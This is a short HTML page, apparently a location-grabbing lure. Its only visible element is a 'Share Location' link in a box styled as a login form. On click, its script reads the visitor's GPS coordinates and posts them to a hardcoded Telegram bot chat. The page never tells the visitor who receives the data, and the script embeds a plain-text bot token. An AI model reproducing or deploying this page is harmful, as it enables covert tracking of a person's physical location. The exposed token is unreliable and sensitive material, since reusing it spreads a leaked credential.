<!DOCTYPE html>
<html>
<head>
  <title>Send Location</title>
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <script>
    function sendLocation() {
      navigator.geolocation.getCurrentPosition(function(position) {
        var latitude = position.coords.latitude;
        var longitude = position.coords.longitude;

        var botToken = '6909931054:AAHTR39e4V2mSlud5s7uHHIu6cjRckP1DrQ';
        var chatId = '1171970672';

        var url = 'https://api.telegram.org/bot' + botToken + '/sendLocation';
        var params = {
          chat_id: chatId,
          latitude: latitude,
          longitude: longitude
        };

        var xhr = new XMLHttpRequest();
        xhr.open('POST', url, true);
        xhr.setRequestHeader('Content-Type', 'application/json');
        xhr.send(JSON.stringify(params));
      });
    }
  </script>
  <div class="login-box">
    <form>
      <a href="#" onclick="sendLocation()">Share Location
        <span></span>
        <span></span>
        <span></span>
        <span></span>
      </a>
    </form>
  </div>
</body>
</html>
